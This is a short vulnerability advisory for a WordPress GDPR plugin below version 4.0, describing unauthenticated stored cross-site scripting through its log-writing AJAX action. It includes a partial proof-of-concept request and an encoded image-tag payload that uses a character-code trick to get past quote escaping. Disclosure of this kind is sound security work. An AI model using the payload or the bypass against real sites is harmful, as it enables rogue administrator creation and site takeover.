DSGVO All in one for WP < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
The dsgvoaio_write_log AJAX action of the plugin did not sanitise or escape some POST parameter submitted before outputting them in the Log page in the administrator dashboard (wp-admin/admin.php?page=dsgvoaiofree-show-log). This could allow unauthenticated attackers to gain unauthorised access by using an XSS payload to create a rogue administrator account, which will be trigged when an administrator will view the logs.
Proof of Concept
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept-Encoding: gzip, deflate
Payload will be processed by update_option(). This will lead into escaped single and double qoutes. You can use
the String.fromCharCode string construction to bypass this limitation, such as %3Cimg%20src%3D1%20style%3Ddisplay%3Anone%20onerror%3Deval(String.fromCharCode(97%2C108%2C101%2C114%2C116%2C40%2C49%2C50%2C41))%3E